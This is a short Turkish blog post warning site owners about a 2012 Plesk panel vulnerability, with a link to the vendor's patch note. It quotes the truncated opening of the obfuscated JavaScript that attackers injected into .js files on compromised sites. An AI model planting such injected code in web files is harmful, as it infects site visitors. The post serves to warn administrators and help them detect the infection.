plesk vulnerability etiketine sahip kayıtlar gösteriliyor. Tüm kayıtları göster
plesk vulnerability etiketine sahip kayıtlar gösteriliyor. Tüm kayıtları göster

7 Ekim 2012 Pazar

Plesk için Kritik Güvenlik Açığı

Merhabalar. Haziran 2012'de duyurusu yapılan ve benimde geçenlerde başıma gelen Plesk panellerin tüm sürümlerinde olan bir güvenlik açığından bahsedicez.
Paralells tarafından bu kritik açığın kapatılması için gerekli güncelleme dosyaları yayınlandı. Ayrıntılı bilgiyi buradan http://kb.parallels.com/en/113321 inceleyebilirsiniz.
Bu açık ile özellikle .js dosyalarına
/*km0ae9gr6m*/try{prototype%2;}catch(asd){x=2;}try{q=document[(x)?”c”+”r”:2+
şeklinde devam eden şifreli bir kod bulaşıyor.
Eğer bilgisayarınızda güncel bir antivirüs programı kullanmamakta ve sunucunuz üzerinde gerekli güvenlik önlemleri ile birlikte güncelleme işlemi gerçekleştirilmedi ise muhtemel olarak sitenize girişte bu tip virüs uyarılarıları ile karşılaşmanız kaçınılmaz olacaktır.